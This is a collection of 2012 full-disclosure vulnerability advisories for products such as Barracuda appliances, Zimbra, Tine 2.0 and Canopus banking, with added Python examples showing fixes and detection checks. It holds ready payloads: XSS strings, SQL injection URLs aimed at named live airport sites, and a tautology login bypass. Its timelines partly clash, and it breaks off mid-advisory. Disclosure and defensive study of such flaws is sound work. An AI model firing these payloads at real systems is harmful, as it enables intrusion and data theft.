The Barracuda Spam & Virus Firewall is compatible with all email servers and can fit into nearly any corporate or small business environment. It is used by small organizations with as few as 10 employees and large organizations with as many as 200,000 employees. A single Barracuda Spam & Virus Firewall handles up to 100,000 active email users. Multiple units can be clustered together for even greater capacity and high availability. The Barracuda Spam & Virus Firewall protects your email server with twelve defense layers:
* Network Denial of Service Protection
* Rate Control
* IP Reputation Analysis
* Sender Authentication
* Recipient Verification
* Virus Scanning
...

(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/spam_overview.php)

Abstract:
=========
The Vulnerability Lab Team discovered multiple persistent web vulnerabilities in the Barracuda Spam & Virus Firewall 600 appliance application.

Report-Timeline:
================
2011-04-01: Vendor Notification
2011-08-04: Vendor Response/Feedback
2011-12-22: Vendor Fix/Patch by Check
2012-01-19: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected in the web interface of the Barracuda Spam & Virus Firewall 600. A local low-privileged user account can inject malicious persistent script code. When exploited by an authenticated user, the identified vulnerabilities can lead to information disclosure, access to servers reachable on the intranet, and manipulation of persistent content.

Vulnerable Module(s):
[+] Trace route Device - Troubleshooting
[+] LDAP Configuration - LDAP Username

Affected Version(s):
[+] Barracuda Spam & Virus Firewall 600

Affected Firmware(s):
[+] Firmware v4.0.1.009 & older versions

Picture(s):
../ldap.png

Proof of Concept:
=================
The persistent vulnerabilities can be exploited by local low-privileged user accounts with low required user interaction, or by remote attackers with high required user interaction.

Manual steps ...
1. Log in to the Barracuda application.
2. Open the vulnerable area where the persistent vulnerability is located.
3. Insert your own script code or PoC and save/execute the content to inject it.
4. View the injected result, which is stored on the application side. The code is executed in the output section.

PoC:
%3E%3E%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%76%75%6C%6E%65%72%61%62%69%6C%69%74%79%2D%6C%61%62%2E%63%6F%6D%20%77%69%64%74%68%3D%36%30%30%20%68%65%69%67%68%74%3D%36%30%30%3E

URL-decoded, the payload reads:
>>"<iframe src=http://www.vulnerability-lab.com width=600 height=600>

Solution:
=========
2011-12-22: Vendor Fix/Patch

Risk:
=====
The security risk of the persistent vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
[Full-disclosure] Engine by Avatarus Simple CMS - SQL Injection Vulnerability
Title:
======
Engine by Avatarus Simple CMS - SQL Injection Vulnerability

Date:
=====
2012-01-19

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=388

VL-ID:
=====
388

Introduction:
=============
Engine by Avatarus, powered by Simple CMS, is mainly used on pages devoted to games.

(Copy of the Vendor Homepage: http://avatarus.biz)

Abstract:
=========
A Vulnerability Laboratory researcher discovered a critical (remote) SQL Injection vulnerability in Engine by Avatarus, powered by Simple CMS.

Report-Timeline:
================
2012-01-19: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A remote SQL Injection vulnerability has been discovered in the Engine by Avatarus application, powered by Simple CMS. The vulnerability allows an attacker to execute their own SQL commands via injection. The bug is located in the following files: panel_admina.php, artykul.php and raport.php. Successful exploitation can result in compromise of the CMS DBMS via remote SQL injection.

Vulnerable Module(s):
[+] panel_admina.php
[+] artykul.php
[+] raport.php

Risk:
=====
The security risk of the remote SQL injection vulnerability is estimated as high(+).

Credits:
========
Vulnerability Laboratory Researcher - snup (snup@gmail.com)

Gr33tz:
agilob, cOnd, czoik, drummachina, gocys, prick
im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom
antonius, Rem0ve, irc.freenode.net #pakamera

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab

--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Snitz Communications 2010/11 - SQL Injection Vulnerability
Title:
======
Snitz Communications 2010/11 - SQL Injection Vulnerability

Date:
=====
2012-01-18

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=384

VL-ID:
=====
384

Introduction:
=============
Snitz Forums 2000, one of the best ASP based bulletin board systems on the market. Getting better every day! A complete board system (forum) that allows the user access to a friendly and intuitive interface.

(Copy of the Vendor Homepage: http://forum.snitz.com/specs.asp)

Abstract:
=========
A Vulnerability Laboratory researcher discovered a remote SQL Injection vulnerability in Snitz Communications forum software.

Report-Timeline:
================
2011-11-02: Vendor Notification
2012-01-18: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A remote SQL Injection vulnerability has been discovered in the Snitz Communications forum application. The vulnerability allows an attacker to execute their own SQL commands via injection. The bug is located in the forum.asp file, in the TOPIC_ID parameter. Successful exploitation can result in compromise of the application DBMS.

Vulnerable Module(s):
[+] Forum.ASP

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduction ...

DORK: inurl:forum.asp?TOPIC_ID= intext:2000 - 2001 Snitz Communications

PoC:
http://127.0.0.1/forum.asp?TOPIC_ID=[SQL INJECTION]

Risk:
=====
The security risk of the remote SQL injection vulnerability is estimated as high(+).

Credits:
========
Vulnerability Laboratory Researcher - Snup (snup@gmail.com)

Gr33tz:
agilob, cOnd, czoik, drummachina, gocys, prick
im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom
antonius, Rem0ve, irc.freenode.net #pakamera
[Full-disclosure] Tine v2.0 Maischa - Cross Site Scripting Vulnerability
Title:
======
Tine v2.0 Maischa - Cross Site Scripting Vulnerability

Date:
=====
2012-01-13

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=379

VL-ID:
=====
379

Introduction:
=============
Tine 2.0 is an open source project which combines groupware and CRM in one consistent interface. Tine 2.0 is web-based and optimises collaboration and organisation of groups in a lasting manner. Tine 2.0 unites all the advantages of open source software with an extraordinarily high level of usability and an equally high standard of professional software development. This is what makes the difference between Tine 2.0 and many other existing groupware solutions. Tine 2.0 includes address book, calendar, email, tasks, time tracking and CRM. Intelligent functions and links make collaboration in Tine 2.0 a true pleasure and include:
* Synchronising mobile telephones, such as iPhone, Android, Nokia and Windows Mobile
* VoIP integration
* Flexible assigning of authorisation rights
* Dynamic lists
* Search functions
* History
* PDF export

(Copy from the Vendor Homepage: http://www.tine20.org/)

Abstract:
=========
A Vulnerability-Lab Team researcher discovered multiple persistent web vulnerabilities in the Tine v2.0 application.

Report-Timeline:
================
2011-12-01: Vendor Notification
2012-01-12: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
MetaWays
Product: Tine CMS v2.0

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected in the Tine v2.0 application. Attackers with a local user account can store malicious script code that is later executed in specific user/admin requests. The vulnerabilities allow a locally privileged attacker to manipulate the application via persistent script code injection. Successful exploitation can result in session hijacking or persistent manipulation of request context.

Vulnerable Module(s):
[+] New Contacts - Input & Output
[+] Lead Name - Input & Output

Picture(s):
../1.png
../2.png
../3.png

Proof of Concept:
=================
The vulnerability can be exploited by local privileged user accounts or local attackers. For demonstration or reproduction ...

PoC:
<script>alert(document.cookie)</script><div style=1

Risk:
=====
The security risk of the persistent software vulnerability is estimated as medium(-).

Credits:
========
Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x)
[Full-disclosure] MegaSWF - Persistent Cross Site Scripting Vulnerability
Title:
======
MegaSWF - Persistent Cross Site Scripting Vulnerability

Date:
=====
2012-01-12

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=368

VL-ID:
=====
368

Introduction:
=============
Do you create Flash games, Flash animations, or any other type of content saved in the .SWF extension? MegaSWF offers you a free, stable .SWF file repository on our high-speed servers. To take advantage of our service, simply click the Upload button. You can also create an account with MegaSWF for more capacity and more functionality. We are always adding new features based on the feedback we get from our users.

(Copy of the Vendor Homepage: http://megaswf.com/about)

Abstract:
=========
A Vulnerability-Lab researcher discovered a persistent cross site scripting vulnerability on the MegaSWF website.

Report-Timeline:
================
2011-12-03: Vendor Notification
2012-01-12: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A persistent cross site scripting vulnerability is detected on the MegaSWF website service. The vulnerability allows a remote attacker, with required user interaction, to hijack customer sessions via persistent cross site scripting. Successful exploitation can result in account theft, client-side exploitation or phishing and session hijacking. The bug is located in the input/output handling of the serve module of the MegaSWF web application: an uploaded SWF is embedded on a megaswf.com page and can navigate the hosting page to a javascript: URL, so the script runs in the megaswf.com origin. Because that URL is issued by the uploaded SWF itself, the hosting page can only block it by embedding user-supplied SWFs with allowScriptAccess set to never or by serving them from a separate origin.

Vulnerable Module(s):
[+] serve

Picture(s):
../1.png

Proof of Concept:
=================
The vulnerability can be exploited by a remote attacker with required user interaction. For demonstration or reproduction ...

PoC:
[1] Create a URLRequest object with JavaScript code, such as:
    var alert:URLRequest = new URLRequest("javascript:alert('xss')");
[2] Publishing the SWF on megaswf.com exploits the persistent XSS vulnerability and runs your JavaScript code.

Full code example that can be used on a frame as ActionScript:
    import flash.net.URLRequest;
    import flash.net.navigateToURL;
    // The javascript: URL is opened in the hosting page (_self), i.e. in the megaswf.com origin.
    var alert:URLRequest = new URLRequest("javascript:alert('xss')");
    navigateToURL(alert, "_self");

Reference(s):
http://megaswf.com/serve/1471214

Risk:
=====
The security risk of the persistent cross site scripting vulnerability is estimated as medium(+).

Credits:
========
Vulnerability Research Laboratory - Sebastian Lüdtke (yak0n)
[Full-disclosure] Canopus Internet Banking FIVE - Auth Bypass Vulnerability
Title:
======
Canopus Internet Banking FIVE - Auth Bypass Vulnerability

Date:
=====
2012-01-12

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=305

VL-ID:
=====
305

Introduction:
=============
Automation of small and medium-sized banks, money transfer systems, corporate treasuries, e-payment systems, e-currency bureaux de change and payment institutions: these are the key activity areas of CANOPUS Software Ltd. (established in 1992). Today our clients are dozens of banks, financial companies and payment institutions registered in various jurisdictions.

(Copy of the Vendor Homepage: http://www.canopuslab.com/ )

Abstract:
=========
The Vulnerability-Lab Team (Chokri B.A.) discovered an authentication bypass vulnerability in the Russian Canopus internet banking application.

Report-Timeline:
================
2011-10-31: Vendor Notification
2011-**-**: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2012-01-12: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
An authentication bypass vulnerability is detected in the online banking web application of Canopus Software. The bypass is located in the unsanitised login form of the banking system: the submitted username and password are placed into the login query without parsing, so a SQL tautology in either field makes the WHERE clause always true. Successful exploitation allows an attacker to bypass the login restriction of the banking system and be logged in as the first user record, ID 1 (Admin).

Vulnerable Module(s):
[+] Login

Picture(s):
../1.png

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without user interaction. For demonstration or reproduction ...

Auth Bypass - PoC:
user : ' or 1=1--
pass : ' or 1=1--

Reference(s):
http://tmab.canopus.ru/IBdemo/

Risk:
=====
The security risk of the authentication bypass vulnerability is estimated as critical.

Credits:
========
Vulnerability Research Laboratory - Chokri B.A. (Me!ster)
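The login bypass above, as an added example that is not part of the advisory or of the Canopus product: a constructed users table (id 1 is the admin, as the advisory states) with a login function that splices the form fields into the SQL text, beside the parameterised version that fixes it, and a small log-side check for the tautology probe. The table, column names and passwords are assumptions for illustration; SQLite stands in for the bank's real DBMS, and its comment syntax (`--`) matches the PoC.

```python
import hashlib
import hmac
import sqlite3


def pw_hash(password):
    # Unsalted SHA-256 only keeps the example dependency-free; use a real
    # password hash (bcrypt, scrypt, argon2) in production.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    # Constructed sample data (not from the advisory): id 1 is the admin.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", pw_hash("admin-secret")),
        (2, "alice", pw_hash("alice-secret")),
    ])
    conn.commit()
    return conn


CONN = make_db()


def login_vulnerable(user, password):
    """The unparsed login form: the username is spliced into the SQL text.
    With user = ' or 1=1-- the statement becomes
      SELECT id FROM users WHERE login = '' or 1=1--' AND pw_hash = '...'
    Everything after -- is a comment, the WHERE clause is always true, and
    the application takes the first matching row: id 1, the admin."""
    sql = ("SELECT id FROM users WHERE login = '" + user +
           "' AND pw_hash = '" + pw_hash(password) + "'")
    try:
        row = CONN.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def login_fixed(user, password):
    """Bound parameter plus a constant-time hash comparison: the input is
    data, never SQL, so ' or 1=1-- simply matches no user."""
    row = CONN.execute("SELECT id, pw_hash FROM users WHERE login = ?",
                       (user,)).fetchone()
    if row is None or not hmac.compare_digest(row[1], pw_hash(password)):
        return None
    return row[0]


def looks_like_sqli_probe(value):
    """Cheap log-side check for the classic tautology probe, useful for
    alerting on login attempts; not a substitute for parameterised queries."""
    lowered = value.lower()
    return "'" in lowered and (" or " in lowered or "--" in lowered or "/*" in lowered)


if __name__ == "__main__":
    print("vulnerable login as :", login_vulnerable("' or 1=1--", "' or 1=1--"))
    print("fixed login as      :", login_fixed("' or 1=1--", "' or 1=1--"))
    print("fixed, real creds   :", login_fixed("admin", "admin-secret"))
```

The bypass works even though the password is hashed before it reaches the query, because the username alone rewrites the WHERE clause; the advisory injects both fields, which covers applications that compare the raw password in SQL as well.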
[Full-disclosure] Zimbra Desktop v7.1.2 - Persistent Software Vulnerability
Title:
======
Zimbra Desktop v7.1.2 - Persistent Software Vulnerability

Date:
=====
2012-01-12

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=378

VL-ID:
=====
378

Introduction:
=============
The Zimbra offline client (also Zimbra Desktop) for Microsoft Windows, Apple Mac OS and Linux is currently available in version 7.1.2. Its appearance and operation are almost completely identical to the web interface. The offline client is a Mozilla Prism application.

(Copy from the Vendor Homepage: http://de.wikipedia.org/wiki/Zimbra#Zimbra_Desktop)

Abstract:
=========
The Vulnerability-Lab Team discovered multiple persistent web vulnerabilities in Zimbra's Prism-based desktop application.

Report-Timeline:
================
2011-11-01: Vendor Notification
2012-01-12: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Zimbra Inc.
Product: Zimbra Desktop v7.1.2 b10978

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected in Zimbra Desktop v7.1.2. Attackers with a local account can store malicious script code that is later executed in specific customer/admin requests. The vulnerabilities allow a locally privileged attacker to manipulate the application via persistent script code injection. It is also possible to hijack customer sessions via persistent script code execution on the application side. Successful exploitation can result in manipulation of context/module requests, execution of persistent malicious script code, session hijacking (account theft) and application-side mailbox phishing attacks.

Vulnerable Module(s):
[+] Label Name - Username & MailBox Name

Picture(s):
../1.png
../2.png
../3.png

Proof of Concept:
=================
The vulnerability can be exploited by local low-privileged user accounts or local attackers. For demonstration or reproduction ...

PoC:
%3E%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%65%72%61%62%69%6C%69%74%79%2D%6C%61%62%2E%63%6F%6D%20%77%69%64%74%68%3D%36%30%30%20%68%65%69%67%68%74%3D%36%30%30%3E%3E%3C%22%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%64%69%76%20%73%74%79%6C%65%3D%22%31

URL-decoded, the payload reads:
>"<iframe src=http://vulnerability-lab.com width=600 height=600>><"<script>alert(document.cookie)</script><div style="1

Solution:
=========
The vulnerability can be fixed by restricting the input fields and by encoding the stored values on output, in the input/output section and listings.

Risk:
=====
The security risk of the persistent software vulnerability is estimated as medium(-).

Credits:
========
Vulnerability Research Laboratory - N/A Anonymous
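The persistent script-injection pattern shared by the Barracuda Spam/Virus Firewall 600, Tine 2.0 and Zimbra Desktop advisories above, as an added example that is not part of any of those advisories or products: the two published URL-encoded payloads are decoded so the injected markup is readable, a stored field is rendered the vulnerable way (written straight into the page) and the fixed way (contextually escaped on output, the remedy the Zimbra solution section describes), and a blacklist filter that only strips `<script>` is shown to leave the iframe in place. The `render_label_*` functions, the span markup and the tag list in `ACTIVE_TAG` are assumptions for illustration, not code from the affected products.

```python
import html
import re
from urllib.parse import unquote

# The URL-encoded PoC strings as published in the Barracuda Spam/Virus
# Firewall 600 and Zimbra Desktop advisories, joined across their line wraps.
BARRACUDA_POC = (
    "%3E%3E%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E"
    "%76%75%6C%6E%65%72%61%62%69%6C%69%74%79%2D%6C%61%62%2E%63%6F%6D%20%77%69%64%74"
    "%68%3D%36%30%30%20%68%65%69%67%68%74%3D%36%30%30%3E"
)
ZIMBRA_POC = (
    "%3E%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%65%72%61%62"
    "%69%6C%69%74%79%2D%6C%61%62%2E%63%6F%6D%20%77%69%64%74%68%3D%36%30%30%20%68%65%69%67%68"
    "%74%3D%36%30%30%3E%3E%3C%22%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65"
    "%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%64%69%76%20%73%74%79%6C%65"
    "%3D%22%31"
)


def decode_poc(encoded):
    """URL-decode a published payload so the injected markup is readable."""
    return unquote(encoded)


def render_label_vulnerable(label):
    """The stored value (LDAP username, lead name, mailbox label, ...) written
    straight into the page: whatever tags it contains become part of the DOM."""
    return '<span class="label">' + label + '</span>'


def escape_label(label):
    """Contextual output encoding for an HTML text or attribute context:
    < > & " ' are turned into entities, so the value can only ever be text."""
    return html.escape(label, quote=True)


def render_label_safe(label):
    """Same template, value encoded on output (the fix)."""
    return '<span class="label">' + escape_label(label) + '</span>'


def strip_script_tags(label):
    """A blacklist 'fix' that removes <script>...</script> only. It leaves the
    iframe (and any other active element or event handler) in place, which is
    why filtering known-bad tags is not an adequate repair."""
    return re.sub(r"<script\b.*?</script>", "", label, flags=re.I | re.S)


# Elements that load or run attacker-controlled content (illustrative list).
ACTIVE_TAG = re.compile(r"<\s*(script|iframe|object|embed|img)\b", re.I)


def has_active_content(fragment):
    """Detection-side check over a rendered fragment or a stored field dump:
    True if a tag that can load or execute remote content is still present."""
    return ACTIVE_TAG.search(fragment) is not None


if __name__ == "__main__":
    for name, poc in (("Barracuda", BARRACUDA_POC), ("Zimbra", ZIMBRA_POC)):
        payload = decode_poc(poc)
        print(name, "decoded    :", payload)
        print(name, "vulnerable :", has_active_content(render_label_vulnerable(payload)))
        print(name, "blacklist  :", has_active_content(render_label_vulnerable(strip_script_tags(payload))))
        print(name, "escaped    :", has_active_content(render_label_safe(payload)))
```

The decoded Barracuda payload is a bare `<iframe>` pointed at an external site, which is why the advisory lists access to intranet-reachable servers among the consequences: the frame is fetched by whichever administrator views the stored value. Escaping on output, not stripping on input, is the fix that survives new tag names and encodings.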
[Full-disclosure] DUS INT Airport - Multiple SQL Injection Vulnerabilities
Title: == DUS INT Airport - Multiple SQL Injection Vulnerabilities Date: = 2012-01-11 References: === http://www.vulnerability-lab.com/get_content.php?id=173 VL-ID: = 173 Introduction: = Duesseldorf International - Large airports are regional poles for growth all around the world. For the home economy they provide a quick access to the important markets and every metropolis all over the world. They interconnect economic regions and form the basis for business. In many industries the proximity to an airport plays a major role with the decision about the branch also for foreign investors; but it is the entire environment that benefits. Düsseldorf International is the most important airport in Germany s most important economic region. It places ready an infrastructure for the state that opens it up from inside and makes it accessible from outside. (Copy of the Vendor Homepage: http://www.duesseldorf-international.de) Abstract: = An anonymous laboratory researcher discovered multiple (critical/remote) SQL Injection Vulnerabilities on Duesseldorf-international airport Vendor website/portal. Report-Timeline: 2011-04-00: Vendor Notification 2011-**-**: Vendor Response/Feedback 2011-12-01: Vendor Fix/Patch 2012-01-11: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Critical Details: Multiple SQl-Injection vulnerabilities are detected on the DUS INT Airport Website Services. The remote vulnerability allows an remote attacker to execute own sql commands on the vulnerable value or module. Successful exploitation of the remote SQL Injection vulnerabilities can result in access to all db tables, read server/root passwords, access to sensitive information like customer creditcards/bonuscards, identity-listings, flight-number, schedules, tickets, IDs, packetnumbers, flightfields, pins, ccs, cvs, emails company/business details. 
Vulnerable Module(s):
[+] Fotoarchiv
[+] Shoplist
[+] Media info

Picture(s):
../01.jpg
../02.jpg
../03.jpg

Proof of Concept:
The vulnerabilities can be exploited by remote attackers. For demonstration ...

Server: www.duesseldorf-international.de
Path: /dus/fotos_grafiken/
Files: index.php
Para: ?from=fotoarchiv&foto_id=28 [sqlinj]

Server: www.flughafen-duesseldorf.de
Path: /dus/shopliste/
Files: index.php
Para: ?back=/besucher/suche=branche&branche_id=1 [blind sqlinj]

Server: www.duesseldorf-international.de
Path: /dus_en/medieninfo_detail/
Files: index.php
Para: ?limit=0&recherche=1&thema=47&id=30 [sqlinj]

Reference(s):
http://www.duesseldorf-international.de/dus/fotos_grafiken/?from=fotoarchiv&foto_id=28
http://www.flughafen-duesseldorf.de/dus/shopliste/?back=/besucher/suche=branche&branche_id=1
http://www.duesseldorf-international.de/dus_en/medieninfo_detail/?limit=0&recherche=1&thema=47&id=30

PoC:
http://www.duesseldorf-international.de/dus/fotos_grafiken/?from=fotoarchiv&foto_id=28%20union%20all%20select%201,2,3,4--
http://www.flughafen-duesseldorf.de/dus/shopliste/?back=/besucher/suche=branche&branche_id=1%20and%201=2
http://www.duesseldorf-international.de/dus_en/medieninfo_detail/?limit=0&recherche=1&thema=47&id=30 and 1=2 union all select 1,2,@@version,@@version,@@version,6,7,8,9,10,11--

Solution:
2011-12-01: Vendor - FULL Fix/Patch

Risk:
The security risk of the remote SQL injection vulnerabilities is estimated as very critical because of the infrastructure behind them.

Credits:
Vulnerability Research Laboratory - N/A Anonymous
[Full-disclosure] Barracuda SSL VPN 480 - Multiple Web Vulnerabilities
Title:
Barracuda SSL VPN 480 - Multiple Web Vulnerabilities

Date:
2012-01-12

References:
http://www.vulnerability-lab.com/get_content.php?id=35

VL-ID:
35

Introduction:
The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any Web browser. Designed for remote employees and road warriors, the Barracuda SSL VPN provides comprehensive control over file systems and Web-based applications requiring external access. The Barracuda SSL VPN integrates with third-party authentication mechanisms to control user access levels and provides single sign-on.

Barracuda SSL VPN
* Enables access to corporate intranets, file systems or other Web-based applications
* Tracks resource access through auditing and reporting facilities
* Scans uploaded files for viruses and malware
* Leverages multi-factor, layered authentication mechanisms, including RSA SecurID and VASCO tokens
* Integrates with existing Active Directory and LDAP directories
* Utilizes policies for granular access control framework
* Supports any Web browser on PC or Mac

(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/sslvpn.php)

Abstract:
Vulnerability-Lab Team discovered multiple persistent Web Vulnerabilities on the Barracuda SSL VPN 480 appliance.

Report-Timeline:
2011-04-02: Vendor Notification
2011-05-07: Vendor Response/Feedback
2011-12-18: Vendor Fix/Patch
2012-01-12: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
Remote

Severity:
Medium

Details:
Multiple persistent Input Validation vulnerabilities are detected on Barracuda's SSL VPN 480. Local low privileged user accounts can implement/inject malicious persistent script code. When exploited by an authenticated user, the identified vulnerabilities can lead to information disclosure, access to intranet-available servers and manipulated persistent content.
Vulnerable Module(s):
[+] Create Personal Network Place
[+] Network Places 6 Create Network Places
[+] SSL Tunnels & My Favorites

Affected Product(s):
[+] Barracuda SSL VPN 480 - Firmware v2.0.1.019 & older versions

Picture(s):
../ive1.png
../ive2.png

Proof of Concept:
The vulnerabilities can be exploited by local low privileged user accounts or by remote attackers via high user interaction. For demonstration or reproduce ...

1. Login
2. Open the vulnerable area where the persistent vulnerability is located
3. Include/Insert your own script code and save the content to inject
4. View the injected results which were stored on application side. The code is getting executed in the listing output section

Solution:
2011-12-18: Vendor Fix/Patch

Risk:
The security risk of the persistent vulnerabilities is estimated as medium(+).

Credits:
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
[Full-disclosure] WebTitan Appliance v3.50.x - Multiple Web Vulnerabilities
Title:
WebTitan Appliance v3.50.x - Multiple Web Vulnerabilities

Date:
2012-01-13

References:
http://www.vulnerability-lab.com/get_content.php?id=89

VL-ID:
89

Introduction:
WebTitan is a complete internet monitoring software (web filter) which provides organisations protection for their data from malware and other internet threats such as viruses, spyware and phishing, as well as providing user policy browsing tools to ensure corporate internet policy is adhered to.

Feature Set
* Includes proxy server and cache
* URL Filtering – 53 predefined categories, customizable category creation
* Granular policy engine based on users and groups
* Content control
* Application controls
* Includes Anti-virus Protection
* Simple download and installation process
* Plug and Play solution
* Highly Effective web filtering capabilities
* ISO and VMware® options
* Easy to set up - Up and running in 30 minutes
* Web based administrative GUI
* Multiple automated reports for entire user activity
* Automated updating including URL filters, anti-virus, version releases and system backup
* LDAP integration

(Copy of the Vendor Website: http://www.webtitan.com/products)

Abstract:
Vulnerability Lab Team discovered multiple persistent Input Validation vulnerabilities on the WebTitan Appliance.

Report-Timeline:
2011-09-17: Vendor Notification
2012-01-14: Public or Non-Public Disclosure

Status:
Published

Affected Products:
Copperfasten Technologies
Product: WebTitan Appliance Application v3.50.x

Exploitation-Technique:
Remote

Severity:
High

Details:
Multiple persistent input validation vulnerabilities are detected on the WebTitan Application 3.50.x. The vulnerability allows privileged user accounts to inject malicious persistent script code to manipulate application requests. Successful exploitation can result in session hijacking, account theft, persistent exploitation and persistent context manipulation.
Vulnerable Module(s):
[+] NTP Server (Display)
[+] Extensions / Execute Files
[+] Setup Time
[+] Categories Add/Edit
[+] Add URL

Picture(s):
../ive1.png
../ive2.png
../ive3.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ...

Code Review: NTP Servers

<tbody><tr>
<td colspan=4 align=center bgcolor=#a8a8a8></td>
</tr><tr class=even id=ntpservers_row_1>
<td width=1% nowrap=nowrap>1</td><td align=left width=100% nowrap=nowrap>pool.ntp.org</td><td class=action nowrap=nowrap><img class=imgbutton alt=Delete title=Delete src=imgs/delete.png onclick="nList.updateList('ntpservers', 0, '1', 'pool.ntp.org');"></td></tr><tr classname=even class=even id=ntpservers_row_2><td width=1%>2</td>
<td>INCLUDE PERSISTENT SCRIPTCODE HERE!</iframe></td><td classname=action class=action><img onclick="simpleList.prototype.updateList('ntpservers', 0, '2');" src=imgs/delete.png title=Delete alt=Delete class=imgbutton></td></tr></tbody>

Code Review: Categories - URL

<tbody><tr id=row_name><td class=dialogLabel>Category name:</td>
<td><input classname="" class="" name=name id=name style="width: 300px;" value="" type=text></td>
</tr><tr id=row_description><td class=dialogLabel>Description:</td>
<td><input classname="" class="" name=description id=description style="width: 300px;" value="" type=text></td>
</tr><tr id=row_urls><td class=dialogLabel valign=top>URLs:</td>
<td valign=top><table bgcolor=#e8e8e8 cellpadding=0><tbody><tr>
<td><input classname="" class="" name=urls_entry style="width: 215px;" id=urls_entry type=text></td>
<td><input class=button name=urls_button value=Add onclick="urlList.updateList('urls', 1, 'Invalid URL');" style="width: 85px;" id=urls_button type=button></td>
</tr><tr><td colspan=2 style="width: 300px;"><table class=slist id=urls_table><tbody><tr>
<td colspan=4 align=center bgcolor=#a8a8a8></td></tr>
<tr classname=even class=even id=urls_row_1><td width=1%>1</td><td>INCLUDE PERSISTENT SCRIPTCODE HERE!</td><td classname=action class=action><img onclick="simpleList.prototype.updateList('urls', 0, '1');"
src=imgs/delete.png title=Delete alt=Delete
[Full-disclosure] ATMAIL WebMail Admin v6.3.4 - Multiple Vulnerabilities
Title:
ATMAIL WebMail Admin v6.3.4 - Multiple Vulnerabilities

Date:
2012-01-07

References:
http://www.vulnerability-lab.com/get_content.php?id=376

VL-ID:
376

Introduction:
Atmail is a commercial Linux messaging platform provider. The company was founded in 2001 and has its company headquarters located in Peregian Beach, Australia. The company develops webmail, mail-server and groupware solutions built for Linux and other Unix operating systems, and includes the source code under a commercial license. Atmail provides 2 different web based applications which are integrated on appliances or different software types. The first service is the ATWebMail Application, the second is the ATWebMail Admin Application.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/@Mail)

Abstract:
A Vulnerability-Lab researcher discovered multiple Web Vulnerabilities on the famous ATMAIL Web Admin Application v6.3.4.

Report-Timeline:
2012-11-01: Vendor Notification
2012-01-07: Public or Non-Public Disclosure

Status:
Published

Affected Products:
ATMAIL
Product: WebMail Admin v6.3.4

Exploitation-Technique:
Remote

Severity:
High

Details:
